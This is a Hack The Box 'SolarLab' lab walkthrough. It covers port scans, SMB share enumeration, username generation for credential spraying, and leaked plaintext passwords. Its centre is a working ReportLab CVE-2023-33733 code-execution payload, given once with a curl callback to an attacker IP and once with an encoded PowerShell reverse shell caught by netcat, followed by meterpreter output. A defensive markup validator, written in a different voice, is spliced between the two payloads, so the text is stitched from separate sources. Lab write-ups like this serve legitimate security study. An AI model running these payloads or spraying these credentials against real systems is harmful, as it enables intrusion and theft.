HTB SolarLab

SolarLab

user

Nmap

➜  solarLab nmap 10.10.11.16 -p- -T 4
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-17 13:04 CST
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.72% done
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.83% done
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 16.77% done; ETC: 13:07 (0:02:29 remaining)
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 36.06% done; ETC: 13:06 (0:01:25 remaining)
Stats: 0:01:19 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 71.90% done; ETC: 13:05 (0:00:31 remaining)
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.084s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6791/tcp open  hnm

Nmap done: 1 IP address (1 host up) scanned in 105.81 seconds
➜  solarLab vim nmap
➜  solarLab cat nmap
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6791/tcp open  hnm
➜  solarLab cat nmap |grep -oE [0-9]
zsh: no matches found: [0-9]
➜  solarLab cat nmap |grep -oE [0-9]*
zsh: no matches found: [0-9]*
➜  solarLab cat nmap |grep -oE "[0-9]*"
80
135
139
445
6791
➜  solarLab cat nmap |grep -oE "[0-9]*" > port
➜  solarLab cat nmap |grep -oE "[0-9]*" | paste -sd ','
80,135,139,445,6791
➜  solarLab port=(cat nmap |grep -oE "[0-9]*" | paste -sd ',')
zsh: parse error near `|'
➜  solarLab port=$(cat nmap |grep -oE "[0-9]*" | paste -sd ',')
➜  solarLab port
zsh: command not found: port
➜  solarLab echo $port
80,135,139,445,6791
➜  solarLab nmap 10.10.11.16 -p 80,135,139,445,6791 -sCV
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-17 13:08 CST
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.10s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: SolarLab Instant Messenger
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5m16s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-05-17T05:03:45
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.50 seconds

Windows machine; open ports: 80, 135, 139, 445, 6791.

80

Usernames taken from the site:

➜  solarLab cat username
ALEXANDER
Alexander Knight
BLAKE
Blake Byte
CLAUDIA
Claudia Springer
alexander
blake
claudia

Enumerating with an empty password finds a valid account, ALEXANDER, that can read the SMB shares:

➜  solarLab crackmapexec smb 10.10.11.16 -u username -p '' --shares --rid-brute 10000
SMB         10.10.11.16     445    SOLARLAB         [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB         10.10.11.16     445    SOLARLAB         [+] solarlab\ALEXANDER:
SMB         10.10.11.16     445    SOLARLAB         [*] Enumerated shares
SMB         10.10.11.16     445    SOLARLAB         Share           Permissions     Remark
SMB         10.10.11.16     445    SOLARLAB         -----           -----------     ------
SMB         10.10.11.16     445    SOLARLAB         ADMIN$                          Remote Admin
SMB         10.10.11.16     445    SOLARLAB         C$                              Default share
SMB         10.10.11.16     445    SOLARLAB         Documents       READ
SMB         10.10.11.16     445    SOLARLAB         IPC$            READ            Remote IPC
SMB         10.10.11.16     445    SOLARLAB         500: SOLARLAB\Administrator (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         501: SOLARLAB\Guest (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         503: SOLARLAB\DefaultAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         504: SOLARLAB\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         513: SOLARLAB\None (SidTypeGroup)
SMB         10.10.11.16     445    SOLARLAB         1000: SOLARLAB\blake (SidTypeUser)
SMB         10.10.11.16     445    SOLARLAB         1001: SOLARLAB\openfire (SidTypeUser)
➜  solarLab smbclient   //10.10.11.16/Documents    -U ALEXANDER
Password for [WORKGROUP\ALEXANDER]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Fri Apr 26 22:47:14 2024
  ..                                 DR        0  Fri Apr 26 22:47:14 2024
  concepts                            D        0  Fri Apr 26 22:41:57 2024
  desktop.ini                       AHS      278  Fri Nov 17 18:54:43 2023
  details-file.xlsx                   A    12793  Fri Nov 17 20:27:21 2023
  My Music                        DHSrn        0  Fri Nov 17 03:36:51 2023
  My Pictures                     DHSrn        0  Fri Nov 17 03:36:51 2023
  My Videos                       DHSrn        0  Fri Nov 17 03:36:51 2023
  old_leave_request_form.docx         A    37194  Fri Nov 17 18:35:57 2023
		7779839 blocks of size 4096. 1876511 blocks available

Bulk download of the share:

➜  smb smbclient   //10.10.11.16/Documents    -U ALEXANDER -c "prompt off;recurse on;mget *"
Password for [WORKGROUP\ALEXANDER]:
getting file \desktop.ini of size 278 as desktop.ini (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \details-file.xlsx of size 12793 as details-file.xlsx (34.3 KiloBytes/sec) (average 18.8 KiloBytes/sec)
getting file \old_leave_request_form.docx of size 37194 as old_leave_request_form.docx (81.1 KiloBytes/sec) (average 43.6 KiloBytes/sec)
getting file \concepts\Training-Request-Form.docx of size 161337 as concepts/Training-Request-Form.docx (346.3 KiloBytes/sec) (average 130.7 KiloBytes/sec)
getting file \concepts\Travel-Request-Sample.docx of size 30953 as concepts/Travel-Request-Sample.docx (83.0 KiloBytes/sec) (average 121.8 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \My Music\*
NT_STATUS_ACCESS_DENIED listing \My Pictures\*
NT_STATUS_ACCESS_DENIED listing \My Videos\*

Among these, old_leave_request_form.docx is a leave request form template.

details-file.xlsx

The spreadsheet yields a list of passwords.

➜  solarLab crackmapexec winrm 10.10.11.16  -u username -p password

Tried brute-forcing WinRM with these usernames and passwords; it failed.

6791

➜  solarLab curl solarlab.htb:6791 -v
*   Trying 10.10.11.16:6791...
* TCP_NODELAY set
* Connected to solarlab.htb (10.10.11.16) port 6791 (#0)
> GET / HTTP/1.1
> Host: solarlab.htb:6791
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.24.0
< Date: Fri, 17 May 2024 05:05:18 GMT
< Content-Type: text/html
< Content-Length: 169
< Connection: keep-alive
< Location: http://report.solarlab.htb:6791/
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0</center>
</body>
</html>
* Connection #0 to host solarlab.htb left intact

301 redirect to report.solarlab.htb

AlexanderK, ClaudiaS

These two usernames exist; the login form reports a wrong password.

Tried the passwords and the security-question answers as the password payload.

The brute force did not succeed.

Try generating more username variants:

import argparse


def generate_additional_combinations(parts):
    """Extra patterns for two-part names (first name + surname)."""
    combinations = set()
    if len(parts) == 2:
        first, last = parts
        # first name lower case + surname with a lower-case initial (blakeByte -> blakebyte)
        combinations.add(first.lower() + last[0].lower() + last[1:])
        combinations.add(first.lower() + last[0].lower())   # blakeb
        combinations.add(first.upper() + last[0].upper())   # BLAKEB

        combinations.add(last.lower() + first[0].lower())   # byteb
        combinations.add(last.upper() + first[0].upper())   # BYTEB
    return combinations


def generate_usernames(usernames):
    generated_usernames = set()
    for name in usernames:
        # split on '.' for "first.last", otherwise on whitespace for "First Last"
        parts = name.split('.') if '.' in name else name.split()
        parts = [p for p in parts if p]  # drop empty fragments from doubled separators
        if not parts:
            continue

        # common username forms
        generated_usernames.add(name.lower())                               # all lower case
        generated_usernames.add(name.upper())                               # all upper case
        generated_usernames.add(''.join(p[0] for p in parts).lower())       # initials, lower case
        generated_usernames.add('.'.join(parts).lower())                    # dot-joined, lower case

        # special combinations
        generated_usernames.update(generate_additional_combinations(parts))

    return sorted(generated_usernames)


def read_usernames(filename):
    with open(filename, 'r') as file:
        return [line.strip() for line in file if line.strip()]


def main():
    parser = argparse.ArgumentParser(description='Generate possible usernames.')
    parser.add_argument('-f', '--input-file', required=True, help='Input file containing a list of usernames.')
    parser.add_argument('-o', '--output-file', default='output.txt', help='Output file for possible usernames.')

    args = parser.parse_args()

    usernames = read_usernames(args.input_file)
    new_usernames = generate_usernames(usernames)
    with open(args.output_file, 'w') as file:
        for username in new_usernames:
            file.write(username + '\n')

    print(f"Username combinations have been written to {args.output_file}")


if __name__ == "__main__":
    main()

blakeb

BLAKEB : ThisCanB3typedeasily1@

are valid credentials.

This dashboard is used to submit various request tickets: leave, travel, and so on.

➜  solarLab exiftool output.pdf
ExifTool Version Number         : 12.76
File Name                       : output.pdf
Directory                       : .
File Size                       : 292 kB
File Modification Date/Time     : 2024:05:17 14:09:50+08:00
File Access Date/Time           : 2024:05:17 14:10:05+08:00
File Inode Change Date/Time     : 2024:05:17 14:10:05+08:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Author                          : (anonymous)
Create Date                     : 2024:05:17 09:03:21-02:00
Creator                         : (unspecified)
Modify Date                     : 2024:05:17 09:03:21-02:00
Producer                        : ReportLab PDF Library - www.reportlab.com
Subject                         : (unspecified)
Title                           : (anonymous)
Trapped                         : False
Page Mode                       : UseNone
Page Count                      : 1

The key detail is the Producer field, reportlab.com; searching online turns up a ReportLab vulnerability.

CVE-2023-33733

Reference: https://github.com/c53elyas/CVE-2023-33733

https://security.snyk.io/vuln/SNYK-PYTHON-REPORTLAB-5664897

Per the CVE description, malicious content inserted into the HTML markup that ReportLab renders can lead to RCE.

Choose the Home Office request form. The input field has a length limit, so edit it directly in the browser dev tools (F12).

<para>
  <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('curl 10.10.16.10') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
    exploit
  </font>
</para>
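As an added example (not code from the writeup or from ReportLab), the defender-side check the request form should run before handing user markup to ReportLab: colour attributes are accepted only as literal colours, the rejection reports which sandbox-escape indicators were present, and the installed version is gated at 3.6.13, the release that fixed CVE-2023-33733. The attribute names beyond `color`, and the sample inputs, are my assumptions.

```python
import re
from html.parser import HTMLParser

# Attribute names that ReportLab's paragraph parser hands to its colour
# converter. 'color' is the one abused on this page; the others are assumed
# from ReportLab's para markup (backColor, borderColor, textColor).
COLOR_ATTRS = {"color", "backcolor", "bordercolor", "textcolor"}

# Allowlist: a colour literal is a named colour, a hex triplet/quad, or rgb().
# Anything else (an expression, a list, a function call) is rejected outright.
SAFE_COLOR = re.compile(
    r"^(?:#[0-9a-fA-F]{3,8}"
    r"|[A-Za-z]{1,32}"
    r"|rgb\(\s*\d{1,3}\s*,\s*\d{1,3}\s*,\s*\d{1,3}\s*\))$"
)

# Fragments of the evaluation-escape technique shown in the writeup's payload,
# reported alongside the rejection so a log reviewer can triage quickly.
INDICATORS = ("__globals__", "getattr(", "type(type(", "setattr(", "lambda", " for ", ".system(")


class _ColorAttrCollector(HTMLParser):
    """Collect (tag, attr, value) for every colour-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names and unescapes entity-encoded values
        for name, value in attrs:
            if name in COLOR_ATTRS and value is not None:
                self.found.append((tag, name, value))


def validate_markup(markup):
    """Return (ok, reasons). ok is False when any colour attribute is not a plain literal."""
    collector = _ColorAttrCollector()
    collector.feed(markup)
    collector.close()
    reasons = []
    for tag, name, value in collector.found:
        if SAFE_COLOR.match(value.strip()):
            continue
        hits = [ind for ind in INDICATORS if ind in value]
        reasons.append(f"<{tag} {name}>: value is not a colour literal; indicators={hits}")
    return (not reasons, reasons)


def reportlab_is_patched(version):
    """True if the ReportLab version string is 3.6.13 or later (the fix for CVE-2023-33733)."""
    nums = tuple(int(x) for x in re.findall(r"\d+", version)[:3])
    return nums >= (3, 6, 13)


# Constructed sample inputs: a benign paragraph, and a non-functional fragment
# in the shape of the page's payload (an expression instead of a colour name).
BENIGN = '<para><font color="red">Working from home on Friday.</font></para>'
MALICIOUS = (
    "<para><font color=\"[ getattr(pow, Word('__globals__')) "
    "for Word in [type(type(1))] ] and 'red'\">exploit</font></para>"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        ok, reasons = validate_markup(sample)
        print(label, "accepted" if ok else "rejected", reasons)
    print("reportlab 3.6.12 patched:", reportlab_is_patched("3.6.12"))
```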

The callback request was received.

Reverse Shell

<para>
  <font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e 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') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
    exploit
  </font>
</para>

Reverse shell obtained.

➜  htb rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444

Connection received on 10.10.11.16 49553
PS C:\Users\blake\Documents\app>

Got the user flag.

root

PS C:\Users\blake\desktop> systeminfo
Host Name:                 SOLARLAB
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00330-80112-18556-AA133
Original Install Date:     11/16/2023, 9:37:33 PM
System Boot Time:          5/17/2024, 8:59:06 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,673 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,147 MB
Virtual Memory: In Use:    1,652 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.11.16
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

It is a Windows 10 system.

PS C:\Users\blake\desktop> net user
User accounts for \\SOLARLAB

-------------------------------------------------------------------------------
Administrator            blake                    DefaultAccount
Guest                    openfire                 WDAGUtilityAccount
The command completed successfully.

There is an openfire user.

meterpreter > execute -f powershell -i -H
Process 3920 created.
Channel 1 created.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\blake\Documents\app> cd ..
PS C:\Users\blake\Documents> cd ..
PS C:\Users\blake> ls -re

    Directory: C:\Users\blake

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---        11/16/2023   9:37 PM                3D Objects
d-r---        11/16/2023   9:37 PM                Contacts
d-r---         5/17/2024   9:45 AM                Desktop
d-r---         5/17/2024   9:22 AM                Documents
d-r---        11/16/2023   9:37 PM                Downloads
d-r---        11/16/2023   9:37 PM                Favorites
d-r---        11/16/2023   9:37 PM                Links
d-r---        11/16/2023   9:37 PM                Music
d-r---        11/16/2023   9:43 PM                OneDrive
d-r---        11/16/2023   9:37 PM                Pictures
d-r---        11/16/2023   9:37 PM                Saved Games
d-r---        11/16/2023   9:40 PM                Searches
d-r---        11/16/2023   9:37 PM                Videos

    Directory: C:\Users\blake\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/17/2024   9:00 AM             34 user.txt
-a----         5/17/2024   9:45 AM        1969664 winPEASany.exe

    Directory: C:\Users\blake\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         5/17/2024   9:50 AM                app
-a----         5/17/2024   9:22 AM        9006080 chisel.exe
-a----          5/4/2024   7:20 PM            243 start-app.bat

    Directory: C:\Users\blake\Documents\app

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/2/2024  12:30 PM                instance
d-----         5/17/2024   9:38 AM                reports
d-----        11/17/2023  10:01 AM                static
d-----        11/17/2023  10:01 AM                templates
d-----         5/17/2024   9:50 AM                __pycache__
-a----        11/17/2023   9:59 AM           1278 app.py
-a----        11/16/2023   2:17 PM            315 models.py
-a----        11/18/2023   6:59 PM           7790 routes.py
-a----         5/17/2024   9:50 AM           7168 shell.exe
-a----          5/2/2024   6:26 PM           3352 utils.py

    Directory: C:\Users\blake\Documents\app\instance

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/2/2024  12:30 PM          12288 users.db

    Directory: C:\Users\blake\Documents\app\reports

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023  12:11 PM                instance

    Directory: C:\Users\blake\Documents\app\reports\instance

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/17/2023  12:11 PM          12288 users.db

    Directory: C:\Users\blake\Documents\app\static

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023  10:01 AM                css
d-----        11/17/2023  10:01 AM                images
d-----        11/17/2023  10:01 AM                js

    Directory: C:\Users\blake\Documents\app\static\css

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        11/17/2023  10:01 AM                images
-a----        10/18/1991   3:00 PM          35973 jquery-ui.css
-a----        11/16/2023   2:56 PM          24743 quill.snow.css

    Directory: C:\Users\blake\Documents\app\static\css\images

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/15/2023   8:02 PM          67680 logo.png
-a----        11/15/2023   4:10 PM         116706 signature.svg.png
-a----        11/16/2023   4:56 PM          29384 ui-icons_444444_256x240.png
-a----        11/16/2023   4:57 PM          29384 ui-icons_555555_256x240.png

    Directory: C:\Users\blake\Documents\app\static\images

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/15/2023   8:02 PM          67680 logo.png
-a----        11/15/2023   8:02 PM         116706 signature.svg.png
-a----        11/16/2023   6:15 PM          29384 ui-icons_444444_256x240.png
-a----        11/16/2023   6:14 PM          29384 ui-icons_555555_256x240.png

    Directory: C:\Users\blake\Documents\app\static\js

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/18/1991   3:00 PM         292458 jquery-3.6.4.js
-a----        10/18/1991   3:00 PM         520714 jquery-ui.js
-a----        11/16/2023   2:58 PM         437299 quill.js

    Directory: C:\Users\blake\Documents\app\templates

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2023   4:51 PM          14619 dashboard.html
-a----        11/16/2023   5:04 PM           6023 homeoffice.html
-a----        11/16/2023   5:00 PM           2274 index.html
-a----        11/16/2023   5:09 PM           6107 leave.html
-a----        11/16/2023   5:12 PM           6609 training.html
-a----        11/16/2023   5:04 PM           6010 travel.html

    Directory: C:\Users\blake\Documents\app\__pycache__

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/2/2024   6:23 PM           2793 app.cpython-311.pyc
-a----        11/17/2023  10:15 AM            976 models.cpython-311.pyc
-a----          5/2/2024   5:09 PM          10121 routes.cpython-311.pyc
-a----          5/2/2024   1:13 PM           6540 utils.cpython-311.pyc

    Directory: C:\Users\blake\Favorites

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-r---         4/26/2024   5:50 PM                Links
-a----         4/26/2024   5:50 PM            208 Bing.url

    Directory: C:\Users\blake\Links

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2023   9:37 PM            494 Desktop.lnk
-a----        11/16/2023   9:37 PM            939 Downloads.lnk

    Directory: C:\Users\blake\Searches

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/16/2023   9:40 PM            859 winrt--{S-1-5-21-3606151065-2641007806-276851432
                                                  0-1000}-.searchconnector-ms

users.db

➜  solarLab sqlite3 users.db
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables;
Error: unknown command or invalid arguments:  "tables;". Enter ".help" for help
sqlite> .tables
user
sqlite> select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
sqlite> exit
   ...> ;
Parse error: near "exit": syntax error
  exit ;
  ^--- error here
sqlite> .q
➜  solarLab sqlite3 users_report.db/users.db
SQLite version 3.44.2 2023-11-24 11:41:44
Enter ".help" for usage hints.
sqlite> .tables
user
sqlite> select * from user;
1|BlakeB|BlakeB
2|ClaudiaS|ClaudiaS
3|AlexanderK|ClaudiaS
4|blakeb|ThisCanB3typedeasily1@
5|claudias|007poiuytrewq
6|alexanderk|HotP!fireguard

Enumerated the credentials stored in plaintext in the db files.

Openfire

exit
meterpreter > netstat

Connection list
===============

    Proto  Local address      Remote address    State        User  Inode  PID/Program name
    -----  -------------      --------------    -----        ----  -----  ----------------
    tcp    0.0.0.0:80         0.0.0.0:*         LISTEN       0     0      5736/nginx.exe
    tcp    0.0.0.0:135        0.0.0.0:*         LISTEN       0     0      904/svchost.exe
    tcp    0.0.0.0:445        0.0.0.0:*         LISTEN       0     0      4/System
    tcp    0.0.0.0:5040       0.0.0.0:*         LISTEN       0     0      1336/svchost.exe
    tcp    0.0.0.0:5985       0.0.0.0:*         LISTEN       0     0      4/System
    tcp    0.0.0.0:6791       0.0.0.0:*         LISTEN       0     0      5736/nginx.exe
    tcp    0.0.0.0:47001      0.0.0.0:*         LISTEN       0     0      4/System
    tcp    0.0.0.0:49664      0.0.0.0:*         LISTEN       0     0      664/lsass.exe
    tcp    0.0.0.0:49665      0.0.0.0:*         LISTEN       0     0      532/wininit.exe
    tcp    0.0.0.0:49666      0.0.0.0:*         LISTEN       0     0      628/svchost.exe
    tcp    0.0.0.0:49667      0.0.0.0:*         LISTEN       0     0      1608/svchost.exe
    tcp    0.0.0.0:49668      0.0.0.0:*         LISTEN       0     0      656/services.exe
    tcp    10.10.11.16:139    0.0.0.0:*         LISTEN       0     0      4/System
    tcp    10.10.11.16:49241  10.10.14.3:9700   ESTABLISHED  0     0      1444/powershell.exe
    tcp    10.10.11.16:49272  10.10.14.3:6150   ESTABLISHED  0     0      588/chisel.exe
    tcp    10.10.11.16:49553  10.10.16.10:4444  CLOSE_WAIT   0     0      60/powershell.exe
    tcp    10.10.11.16:49555  10.10.14.29:5555  CLOSE_WAIT   0     0      3256/powershell.exe
    tcp    10.10.11.16:59100  10.10.14.29:5555  CLOSE_WAIT   0     0      3624/powershell.exe
    tcp    10.10.11.16:59115  10.10.14.29:5555  ESTABLISHED  0     0      264/powershell.exe
    tcp    10.10.11.16:59123  10.10.16.10:4444  ESTABLISHED  0     0      2852/shell.exe
    tcp    10.10.11.16:59127  10.10.14.29:445   ESTABLISHED  0     0      4/System
    tcp    10.10.11.16:59131  10.10.14.29:4444  ESTABLISHED  0     0      1084/nc.exe
    tcp    10.10.11.16:59136  10.10.16.10:445   SYN_SENT     0     0      4/System
    tcp    127.0.0.1:5000     0.0.0.0:*         LISTEN       0     0      -
    tcp    127.0.0.1:5000     0.0.0.0:*         LISTEN       0     0      5068/python3.11.exe
    tcp    127.0.0.1:5000     127.0.0.1:59130   CLOSE_WAIT   0     0      -
    tcp    127.0.0.1:5222     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5223     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5262     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5263     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5269     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5270     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5275     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:5276     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:7070     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:7443     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:9090     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:9090     127.0.0.1:59132   TIME_WAIT    0     0      0/[System Process]
    tcp    127.0.0.1:9091     0.0.0.0:*         LISTEN       0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49520    127.0.0.1:49521   ESTABLISHED  0     0      -
    tcp    127.0.0.1:49521    127.0.0.1:49520   ESTABLISHED  0     0      -
    tcp    127.0.0.1:49669    127.0.0.1:49670   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49670    127.0.0.1:49669   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49671    127.0.0.1:49672   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49672    127.0.0.1:49671   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49673    127.0.0.1:49674   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49674    127.0.0.1:49673   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49675    127.0.0.1:49676   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49676    127.0.0.1:49675   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49677    127.0.0.1:49678   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49678    127.0.0.1:49677   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49679    127.0.0.1:49680   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49680    127.0.0.1:49679   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49681    127.0.0.1:49682   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49682    127.0.0.1:49681   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49683    127.0.0.1:49684   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49684    127.0.0.1:49683   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49685    127.0.0.1:49686   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49686    127.0.0.1:49685   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49687    127.0.0.1:49688   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49688    127.0.0.1:49687   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49689    127.0.0.1:49690   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49690    127.0.0.1:49689   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49691    127.0.0.1:49692   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49692    127.0.0.1:49691   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49693    127.0.0.1:49694   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49694    127.0.0.1:49693   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49695    127.0.0.1:49696   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49696    127.0.0.1:49695   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49697    127.0.0.1:49698   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49698    127.0.0.1:49697   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49699    127.0.0.1:49700   ESTABLISHED  0     0      2104/openfire-service.exe
    tcp    127.0.0.1:49700    127.0.0.1:49699   ESTABLISHED  0     0      2104/openfire-service.exe
